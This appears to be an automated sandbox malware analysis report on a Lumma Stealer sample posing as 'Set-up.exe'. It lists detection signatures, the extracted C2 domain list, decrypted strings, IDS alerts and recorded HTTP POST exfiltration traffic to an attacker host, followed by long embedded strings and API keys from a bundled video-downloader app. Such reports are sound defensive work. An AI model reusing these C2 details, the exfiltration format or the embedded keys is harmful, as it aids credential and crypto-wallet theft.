Edit tour

Windows Analysis Report
'Set-up.exe

Overview

General Information

Sample name:'Set-up.exe
Analysis ID:1584523
MD5:762266932c784bb2723293ad1cbecc37
SHA1:7983d7eda278567ba082c13b5690266212c447d4
SHA256:792474b38315e55d49a76f68e97b8a6b498ca794decc326cbaef5df22476c88d
Tags:exeLummaStealeruser-aachum
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
LummaC encrypted strings found
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Detected potential crypto function
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64
  • 'Set-up.exe (PID: 3940 cmdline: "C:\Users\user\Desktop\'Set-up.exe" MD5: 762266932C784BB2723293AD1CBECC37)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{
  "C2 url": [
    "wholersorie.shop",
    "nearycrepso.shop",
    "tirepublicerj.shop",
    "cloudewahsj.shop",
    "framekgirus.shop",
    "rabidcowse.shop",
    "noisycuttej.shop",
    "passhudmrue.click",
    "abruptyopsn.shop"
  ],
  "Build id": "hRjzG3--DRON"
}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      00000000.00000002.2459089767.00000000023D0000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Donutloader_f40e3759unknownunknown
      • 0x52783:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
      00000000.00000003.2419550458.0000000000945000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000000.00000003.2419435129.000000000092C000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: 'Set-up.exe PID: 3940JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
            Process Memory Space: 'Set-up.exe PID: 3940JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Click to see the 2 entries
              No Sigma rule has matched
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-05T18:53:29.307820+010020283713Unknown Traffic192.168.2.649769172.67.178.174443TCP
              2025-01-05T18:53:31.283423+010020283713Unknown Traffic192.168.2.649778172.67.178.174443TCP
              2025-01-05T18:53:32.557598+010020283713Unknown Traffic192.168.2.649788172.67.178.174443TCP
              2025-01-05T18:53:33.713035+010020283713Unknown Traffic192.168.2.649799172.67.178.174443TCP
              2025-01-05T18:53:42.312298+010020283713Unknown Traffic192.168.2.649851172.67.178.174443TCP
              2025-01-05T18:53:44.138158+010020283713Unknown Traffic192.168.2.649864172.67.178.174443TCP
              2025-01-05T18:53:45.448469+010020283713Unknown Traffic192.168.2.649875172.67.178.174443TCP
              2025-01-05T18:53:46.922776+010020283713Unknown Traffic192.168.2.649884172.67.178.174443TCP
              2025-01-05T18:53:48.713395+010020283713Unknown Traffic192.168.2.649900172.67.178.174443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-05T18:53:30.081192+010020546531A Network Trojan was detected192.168.2.649769172.67.178.174443TCP
              2025-01-05T18:53:31.755774+010020546531A Network Trojan was detected192.168.2.649778172.67.178.174443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-05T18:53:30.081192+010020498361A Network Trojan was detected192.168.2.649769172.67.178.174443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-05T18:53:31.755774+010020498121A Network Trojan was detected192.168.2.649778172.67.178.174443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-05T18:53:41.657467+010020480941Malware Command and Control Activity Detected192.168.2.649799172.67.178.174443TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: 'Set-up.exe.3940.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["wholersorie.shop", "nearycrepso.shop", "tirepublicerj.shop", "cloudewahsj.shop", "framekgirus.shop", "rabidcowse.shop", "noisycuttej.shop", "passhudmrue.click", "abruptyopsn.shop"], "Build id": "hRjzG3--DRON"}
              Source: 'Set-up.exeVirustotal: Detection: 18%Perma Link
              Source: 'Set-up.exeReversingLabs: Detection: 18%
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 92.9% probability
              Source: 00000000.00000002.2459089767.00000000023D0000.00000040.00001000.00020000.00000000.sdmpString decryptor: cloudewahsj.shop
              Source: 00000000.00000002.2459089767.00000000023D0000.00000040.00001000.00020000.00000000.sdmpString decryptor: rabidcowse.shop
              Source: 00000000.00000002.2459089767.00000000023D0000.00000040.00001000.00020000.00000000.sdmpString decryptor: noisycuttej.shop
              Source: 00000000.00000002.2459089767.00000000023D0000.00000040.00001000.00020000.00000000.sdmpString decryptor: tirepublicerj.shop
              Source: 00000000.00000002.2459089767.00000000023D0000.00000040.00001000.00020000.00000000.sdmpString decryptor: framekgirus.shop
              Source: 00000000.00000002.2459089767.00000000023D0000.00000040.00001000.00020000.00000000.sdmpString decryptor: wholersorie.shop
              Source: 00000000.00000002.2459089767.00000000023D0000.00000040.00001000.00020000.00000000.sdmpString decryptor: abruptyopsn.shop
              Source: 00000000.00000002.2459089767.00000000023D0000.00000040.00001000.00020000.00000000.sdmpString decryptor: nearycrepso.shop
              Source: 00000000.00000002.2459089767.00000000023D0000.00000040.00001000.00020000.00000000.sdmpString decryptor: passhudmrue.click
              Source: 00000000.00000002.2459089767.00000000023D0000.00000040.00001000.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
              Source: 00000000.00000002.2459089767.00000000023D0000.00000040.00001000.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
              Source: 00000000.00000002.2459089767.00000000023D0000.00000040.00001000.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
              Source: 00000000.00000002.2459089767.00000000023D0000.00000040.00001000.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
              Source: 00000000.00000002.2459089767.00000000023D0000.00000040.00001000.00020000.00000000.sdmpString decryptor: Workgroup: -
              Source: 00000000.00000002.2459089767.00000000023D0000.00000040.00001000.00020000.00000000.sdmpString decryptor: hRjzG3--DRON
              Source: 'Set-up.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 172.67.178.174:443 -> 192.168.2.6:49769 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.178.174:443 -> 192.168.2.6:49778 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.178.174:443 -> 192.168.2.6:49788 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.178.174:443 -> 192.168.2.6:49799 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.178.174:443 -> 192.168.2.6:49851 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.178.174:443 -> 192.168.2.6:49864 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.178.174:443 -> 192.168.2.6:49875 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.178.174:443 -> 192.168.2.6:49884 version: TLS 1.2

              Networking

              barindex
              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49769 -> 172.67.178.174:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49769 -> 172.67.178.174:443
              Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:49778 -> 172.67.178.174:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49778 -> 172.67.178.174:443
              Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:49799 -> 172.67.178.174:443
              Source: Malware configuration extractorURLs: wholersorie.shop
              Source: Malware configuration extractorURLs: nearycrepso.shop
              Source: Malware configuration extractorURLs: tirepublicerj.shop
              Source: Malware configuration extractorURLs: cloudewahsj.shop
              Source: Malware configuration extractorURLs: framekgirus.shop
              Source: Malware configuration extractorURLs: rabidcowse.shop
              Source: Malware configuration extractorURLs: noisycuttej.shop
              Source: Malware configuration extractorURLs: passhudmrue.click
              Source: Malware configuration extractorURLs: abruptyopsn.shop
              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49769 -> 172.67.178.174:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49778 -> 172.67.178.174:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49788 -> 172.67.178.174:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49799 -> 172.67.178.174:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49851 -> 172.67.178.174:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49864 -> 172.67.178.174:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49875 -> 172.67.178.174:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49884 -> 172.67.178.174:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49900 -> 172.67.178.174:443
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: passhudmrue.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 78Host: passhudmrue.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=EORV0HD9UWAKJ2L405HUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12864Host: passhudmrue.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=WIUPQMPLUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15044Host: passhudmrue.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=NF6QEJRIK626LVRMUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 19950Host: passhudmrue.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=3YYU6JSELTHBZSEBEDUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 5475Host: passhudmrue.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=94KFIXWAMDUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 911Host: passhudmrue.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=QNDAGIMEUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 572454Host: passhudmrue.click
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: 'Set-up.exeString found in binary or memory: ID: %sPlease copy and paste the page source code of the video that you want to download into this boxCXMediaGrabThreadCXMediaSubstreamDownloadThreadconcat-callback_context-callback_window-y-strict-fs%I64d-c-target-filter_complex-loopgif-hls_segment_filename-hls_list_size-lhls-preset-sn-codec:s-an-filter:avolume=%.2f-pre:a-profile:a-bsf:a-q:a-vol-b:a-ar-ac-tag:a-codec:a-vn-filter:vcolorchannelmixer=.393:.769:.189:0:.349:.686:.168:0:.272:.534:.131negatehue=s=0hflipvfliptranspose=1transpose=2,transpose=2transpose=2crop=w=%d:h=%d:x=%d:y=%dcrop=w=%d:h=%d,-pre:v-profile:v-bsf:v-vsync-frames:v-q:v-b:v-aspect-s-pix_fmt-tag:v-codec:v-map%d:%d-i"%s"-itsoffset-t-safe-f-ss-r%d/%d-bufsize-threads-hwaccellibfdk_aacaaccopydropaac_adtstoascconcat:image2animated-imagecaptionxwd_pipexbm_pipexpm_pipewebp_pipevbn_pipetiff_pipesunrast_pipesvg_pipesgi_pipeqoi_pipeqdraw_pipepsd_pipeppm_pipepng_pipepictor_pipephotocd_pipephm_pipepgx_pipepgm_pipepgmyuv_pipepfm_pipepcx_pipepbm_pipepam_pipejpegxl_pipejpegls_pipejpeg_pipej2k_pipegif_pipegem_pipeexr_pipedpx_pipedds_pipecri_pipebmp_pipeimage2_brender_piximage2_alias_piximage2pipeapngtextttyProfileCodecBitRate%s\avcodec-56.dll%s\avcodec-57.dll%s\avcodec-58.dll%s\avcodec-59.dll%s\avcodec-60.dllMediaPlay.exe%s\MediaPlay.exe\PresetsMediaEncode.exe%s\MediaEncode.exeMediaProbe.exe%s\MediaProbe.exe-probesize-analyzeduration-print_format-show_entries-count_frames-show_streams-show_format-loglevelquietDURATIONundlanguagedefaultdispositionchannelssample_ratesample_fmt%d:%dsample_aspect_ratior_frame_rateavg_frame_rateheightwidthpix_fmtnb_read_framesnb_frames%d/%dtime_basetrueis_avcsubtitleaudiovideocodec_typecodec_tag_stringprofilecodec_nameindexstreamsencodertagsprobe_scorebit_ratesizedurationstart_timeformat_namenb_programsnb_streamsformatjson@%s--nio-callback-context--nio-callback-window-#--parallel-max--parallel-immediate--parallel--dump-header--styled-output--retry--speed-time--speed-limit--connect-timeout--compressed--head--nio-local-pos--nio-local-allocated--output--range--location--data--header--cookie--referer--user-agent--proxy--http%s--insecure--cacertaccept-rangescontent-encodingcontent-lengthlocationbytesSet-Cookieset-cookieHTTP/Mozilla/5.0 (Windows NT 10; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0deflategzip1.2.5https://www.youtube.com/%I64d-%I64d-%I64d0-%I64dContent-Type: %sSec-Fetch-Mode: %sAccept-Encoding: %sAccept-Charset: %sAccept-Language: %sAccept: %sCHttpIOThread equals www.youtube.com (Youtube)
              Source: 'Set-up.exeString found in binary or memory: ID: %shttps://www.youtube.com/watch?v=Zk9J5xnTVMAZk9J5xnTVMAPlease enter one URL per linePlease enter at least one URL.You may enter an URL or ID. equals www.youtube.com (Youtube)
              Source: 'Set-up.exeString found in binary or memory: TcUhTc8Tc0Tc_0.1MEDIA_CONNECT_FRONTENDmediaconnect2.0TVHTML5_SIMPLY_EMBEDDED_PLAYERtv_embedded7.20240724.13.00TVHTML5tv2.20240726.01.00MWEBmwebcom.google.ios.ytcreator/24.30.100 (iPhone16,2; U; CPU iOS 17_5_1 like Mac OS X;)IOS_CREATORios_creatorcom.google.ios.youtubemusic/7.08.2 (iPhone16,2; U; CPU iOS 17_5_1 like Mac OS X;)7.08.2IOS_MUSICAIzaSyBAETezhkwP0ZWA02RsqT1zu78Fpt0bC_sios_musiccom.google.ios.youtube/17.33.2 (iPhone14,3; U; CPU iOS 15_6 like Mac OS X)iPhone14,317.33.2IOS_MESSAGES_EXTENSIONios_embedded17.5.1.21F90iPhonecom.google.ios.youtube/19.29.1 (iPhone16,2; U; CPU iOS 17_5_1 like Mac OS X;)iPhone16,219.29.1IOSAIzaSyB-63vPrdThhKuerbB2N_l7Kwwcxj6yUAcioscom.google.android.apps.youtube.producer/0.111.1 (Linux; U; Android 11) gzip0.111.1ANDROID_PRODUCERandroid_producer2AMBcom.google.android.youtube/1.9 (Linux; U; Android 11) gzip1.9ANDROID_TESTSUITEandroid_testsuite12Lcom.google.android.apps.youtube.vr.oculus/1.57.29 (Linux; U; Android 12L; eureka-user Build/SQ3A.220605.009.A1) gzipQuest 3Oculus1.57.29ANDROID_VRandroid_vrcom.google.android.apps.youtube.creator/24.30.100 (Linux; U; Android 11) gzip24.30.100ANDROID_CREATORAIzaSyD_qjV8zaaUMehtLkrKFgVeSX_Iqbtyws8android_creatorcom.google.android.apps.youtube.music/7.11.50 (Linux; U; Android 11) gzip7.11.50ANDROID_MUSICAIzaSyAOghZGza2MQSZkY_zfZ370N-PUdXEo8AIandroid_musiccom.google.android.youtube/17.31.35 (Linux; U; Android 11) gzip17.31.35ANDROID_EMBEDDED_PLAYERAIzaSyCjc_pVEDi4qsv5MtC2dMXzpIaDoRFLsxwandroid_embedded11com.google.android.youtube/19.29.37 (Linux; U; Android 11) gzip19.29.37ANDROIDAIzaSyA8eiZmM1FaDVjRy-df2KTyQ_vz_yYM39wandroid1.20240723.03.00WEB_CREATORAIzaSyBUPetSUmoZL-OhlxA7wSac5XinrygCqMoweb_creator1.20240724.00.00WEB_REMIXmusic.youtube.comAIzaSyC9XL3ZjWddXya6X74dJoCTL-WEYFDNX30web_music1.20240723.01.00WEB_EMBEDDED_PLAYERweb_embeddedMozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.5 Safari/605.1.15,gzip(gfe)2.20240726.00.00web_safari2.20240910.03.00WEBAIzaSyAO_FJ2SlqU8Q4STEHLGCilw_Y9_11qcW8webwww.youtube.comAIzaSyDCU8hByM-4DrUqRUYnGn-3llEO78bcxq8streamTypesgoap/gir%3Dyes%3Bitag%3Dsgovp/gir%3Dyes%3Bitag%3D equals www.youtube.com (Youtube)
              Source: 'Set-up.exeString found in binary or memory: fc|fcpfcdfcXfcLfc@fc4fc(fcCgIQCQ==CgIQCA==CgIQBw==CgIQBg==CgIQBQ==CgIQBA==CgIQAw==CgIQAg==CgIQAQ==CgIQAA==https://www.youtube.com/youtubei/v1/player?key=%s&prettyPrint=falseOriginX-Youtube-Client-VersionX-Youtube-Client-Namegzip, deflateplaybackContextcontentPlaybackContexthtml5PreferenceHTML5_PREF_WANTScontextclientutcOffsetMinutestimeZoneUTChlenuserAgentdeviceModelandroidSdkVersionclientVersionclientNameracyCheckOkcontentCheckOkvideoIdhttps://www.youtube.com/youtubei/v1/browse?key=%s&prettyPrint=falseX-Goog-Visitor-IdcontinuationclickTrackingclickTrackingParamsuseSsluserlockedSafetyModeconfigInfoappInstallDataoriginalUrlacceptHeaderbrowserVersionbrowserNameplatformosVersionosNameclientFormFactordeviceExperimentIddeviceMakevisitorDataremoteHostglUSwgYCCAA=browseIdhttps://www.youtube.com/youtubei/v1/search?key=%s&prettyPrint=falseEgIQAQ==queryAccept-Encoding: identity equals www.youtube.com (Youtube)
              Source: 'Set-up.exeString found in binary or memory: https://www.youtube.com/watch?v=%s&gl=US&hl=en&has_verified=1&bpctr=9999999999lengthSecondshlsManifestUrldashManifestUrladaptiveFormatsformatsdrmFamiliesencryptionapproxDurationMscontentLengthaverageBitrateaudioChannelsaudioSampleRateaudioQualityitagsspsspurlciphersignatureCiphercaptionsvideoDetailsstreamingData\u003d="originalUrl":"",https://www.youtube.com/playlist?list=%shttps://i.ytimg.com/vi/%s/maxresdefault.jpghttps://i.ytimg.com/vi/%s/mqdefault.jpghttps://www.youtube.com/watch?v=%ssingleColumnBrowseResultsRenderertwoColumnBrowseResultsRenderercontentscontinuationContentsonResponseReceivedActionsrunsplaylistIdplaylistHeaderRendererheadercontinuationsplaylistVideoRendererplaylistVideoListRenderersectionListRenderercontenttabRenderertabssimpleTextcontinuationItemRendereritemSectionRenderercontinuationItemsappendContinuationItemsActionplaylistVideoListContinuationthumbnailstokencontinuationCommandcontinuationEndpointnextContinuationDatahttps://www.youtube.com/embed/%s?autoplay=1&rel=0publishedTimeTextownerTextviewCountTextlengthTextlabelaccessibilityDataaccessibilityvshelfRendererreelShelfRenderersearchPyvRenderervideoRendererprimaryContentsreloadContinuationDataelementRenderercompactVideoRenderersectionListContinuationtwoColumnSearchResultsRendereronResponseReceivedCommandsestimatedResults272138https://video.google.com/timedtext?hl=en&type=list&v=%shttps://www.youtube.com/api/timedtext?type=%s&name=%s&fmt=%s&lang=%s&v=%slang_translatedlang_originallang_codenametracktranscript_list18LOGIN_REQUIREDUNPLAYABLEERRORstatushttps://www.youtube.com/results?search_query=%s&page=%dwindow["ytInitialData"]var ytInitialData ="sectionListRenderer":YouTubeytimg.comyoutu.beytcfg.setyoutube-nocookie.comindex=video_ids=/user//vi/ytimg.youtu.be//clip//live//shorts/v=list=p=/channel/youtube.com/shorts/youtube-nocookie.com/embed/youtube.com/embed//watch?v=youtube.com/v/video_idyoutube.VISITOR_INFO1_LIVEYSCGPShl=%s&tz=%sUTCPREFPENDING+CONSENTSOCS__Secure-3PSIDYES+cb.20210328-17-p0.en+FX+%dPREF=%s; CONSENT=%sPREF=%sPREF=%s; CONSENT=%s; GPS=%s; YSC=%s; VISITOR_INFO1_LIVE=%sPREF=%s; GPS=%s; YSC=%s; VISITOR_INFO1_LIVE=%s&ratebypass=yesratebypass=yesratebypassn= equals www.youtube.com (Youtube)
              Source: 'Set-up.exeString found in binary or memory: zcABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789$%3Dsig?n=;n=&n=?sig=?signature=;sig=;signature=&sig=&signature=<INPUT>%s\youtube.com-n.js%s\youtube.com-sig.js%s/youtube.com-n.jshttp://www.fuxiangliu.com/services%s/youtube.com-sig.js//s.ytimg.com//www.youtube.comvar %s%s; input="<INPUT>"; output=%s(input); console.log(output);Decipher_n=function(enhanced_except_var %s={%s};var var %s=function(a){%s}; input="<INPUT>"; output=%s(input); console.log(output);Decipher_sig;a=a.split("")jsUrlWEB_PLAYER_CONTEXT_CONFIG_ID_KEVLAR_WATCHWEB_PLAYER_CONTEXT_CONFIGSPLAYER_JS_URLXSRF_TOKENXSRF_FIELD_NAMEVISITOR_DATASIGNIN_URLSERVER_NAMEPAGE_CLPAGE_BUILD_LABELLOGGED_INclient.nameLATEST_ECATCHER_SERVICE_TRACKING_PARAMSuserInterfaceThemeINNERTUBE_CONTEXTINNERTUBE_CONTEXT_HLINNERTUBE_CONTEXT_GLINNERTUBE_CONTEXT_CLIENT_VERSIONINNERTUBE_CONTEXT_CLIENT_NAMEINNERTUBE_CLIENT_VERSIONINNERTUBE_CLIENT_NAMEINNERTUBE_API_VERSIONINNERTUBE_API_KEYplayerParamswatchEndpointnavigationEndpointswebPrefetchDatawebResponseContextExtensionDataresponseContextbrowseEndpointnavigationEndpointfeaturedChannelplayerAnnotationsExpandedRendererannotationstrackingParamsisPrivateauthorviewCountshortDescriptionchannelIdcontextParamsplayabilityStatusoriginalUrljsUrlresponseContextytInitialData =playabilityStatusytInitialPlayerResponse ="playabilityStatus":"videoDetails":"streamingData":"captions":https://www.google.com/Google Searchgoogle.searchgoogle.com/url?url=https://www.yahoo.com/Yahoo Searchyahoo.searchvideo.search.yahoo.comrurl=youtube.com.InnerTubeyoutube.com.WebPageContentComponentVIDEOpornhubfacebookextractorvcodecextHTML5JWPlayerposter="audio/wavaudio/oggaudio/mpeg<audio</audio>https://%s%saddParam('flashvars',addParam("flashvars",var videoFile="var videoFile='var filepath = "var filepath = 'jwplayermp4aavc1av1vp9vorbisvp8h264Auto close within 00:%02dEnglishTranslatedOriginalCodeLanguages1.0.0M3U8<meta name="title" content="<meta name="twitter:title" content="<meta property="og:image:secure_url" content="<meta name="twitter:image:src" content="<meta name="twitter:image" content="%s\ServicesJSX_duk.exeJSX_SM.dllJSX_V8.dllMediaLanguages%s\Python-32\python.exe%s\Python-64\python.exehttps:/</article><article</table><table<link<meta/div<div</style><style><script</body><body></head><head></html><html>/MPD><MPD.hlsCXMediaSearchThumbnailDownloadThreadl equals www.yahoo.com (Yahoo)
              Source: 'Set-up.exeString found in binary or memory: zcABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789$%3Dsig?n=;n=&n=?sig=?signature=;sig=;signature=&sig=&signature=<INPUT>%s\youtube.com-n.js%s\youtube.com-sig.js%s/youtube.com-n.jshttp://www.fuxiangliu.com/services%s/youtube.com-sig.js//s.ytimg.com//www.youtube.comvar %s%s; input="<INPUT>"; output=%s(input); console.log(output);Decipher_n=function(enhanced_except_var %s={%s};var var %s=function(a){%s}; input="<INPUT>"; output=%s(input); console.log(output);Decipher_sig;a=a.split("")jsUrlWEB_PLAYER_CONTEXT_CONFIG_ID_KEVLAR_WATCHWEB_PLAYER_CONTEXT_CONFIGSPLAYER_JS_URLXSRF_TOKENXSRF_FIELD_NAMEVISITOR_DATASIGNIN_URLSERVER_NAMEPAGE_CLPAGE_BUILD_LABELLOGGED_INclient.nameLATEST_ECATCHER_SERVICE_TRACKING_PARAMSuserInterfaceThemeINNERTUBE_CONTEXTINNERTUBE_CONTEXT_HLINNERTUBE_CONTEXT_GLINNERTUBE_CONTEXT_CLIENT_VERSIONINNERTUBE_CONTEXT_CLIENT_NAMEINNERTUBE_CLIENT_VERSIONINNERTUBE_CLIENT_NAMEINNERTUBE_API_VERSIONINNERTUBE_API_KEYplayerParamswatchEndpointnavigationEndpointswebPrefetchDatawebResponseContextExtensionDataresponseContextbrowseEndpointnavigationEndpointfeaturedChannelplayerAnnotationsExpandedRendererannotationstrackingParamsisPrivateauthorviewCountshortDescriptionchannelIdcontextParamsplayabilityStatusoriginalUrljsUrlresponseContextytInitialData =playabilityStatusytInitialPlayerResponse ="playabilityStatus":"videoDetails":"streamingData":"captions":https://www.google.com/Google Searchgoogle.searchgoogle.com/url?url=https://www.yahoo.com/Yahoo Searchyahoo.searchvideo.search.yahoo.comrurl=youtube.com.InnerTubeyoutube.com.WebPageContentComponentVIDEOpornhubfacebookextractorvcodecextHTML5JWPlayerposter="audio/wavaudio/oggaudio/mpeg<audio</audio>https://%s%saddParam('flashvars',addParam("flashvars",var videoFile="var videoFile='var filepath = "var filepath = 'jwplayermp4aavc1av1vp9vorbisvp8h264Auto close within 00:%02dEnglishTranslatedOriginalCodeLanguages1.0.0M3U8<meta name="title" content="<meta name="twitter:title" content="<meta property="og:image:secure_url" content="<meta name="twitter:image:src" content="<meta name="twitter:image" 